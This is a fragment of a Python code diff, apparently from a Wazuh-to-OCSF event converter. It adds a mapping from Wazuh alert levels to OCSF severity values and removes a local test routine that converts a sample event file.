""" - # TODO normalization - return level + if level >= 15: # (5) Critical + severity = 5 + elif level >= 11: # (4) High + severity = 4 + elif level >= 8: # (3) Medium + severity = 3 + elif level >= 4: # (2) Low + severity = 2 + elif level >= 0: # (1) Informational + severity = 1 + else: + severity = 0 # (0) Unknown + + return severity def join(iterable, separator=","): @@ -84,29 +96,3 @@ def from_json(event: dict) -> models.wazuh.Event: return models.wazuh.Event.model_validate_json(json.dumps(event)) except pydantic.ValidationError as e: print(e) - - -def _test(): - ocsf_event = {} - with open("wazuh-event.sample.json", "r") as fd: - # Load from file descriptor - event = json.load(fd) - try: - # Create instance of Event from JSON input (must be string, bytes or bytearray) - event = models.wazuh.Event.model_validate_json(json.dumps(event)) - print(event) - ocsf_event = to_detection_finding(event) - - except KeyError as e: - raise (e) - except pydantic.ValidationError as e: - print(e) - - if ocsf_event: - with open("wazuh-event.ocsf.json", "w") as fd: - json.dump(ocsf_event.model_dump(), fd) - print(ocsf_event.model_dump()) - - -if __name__ == '__main__': - _test()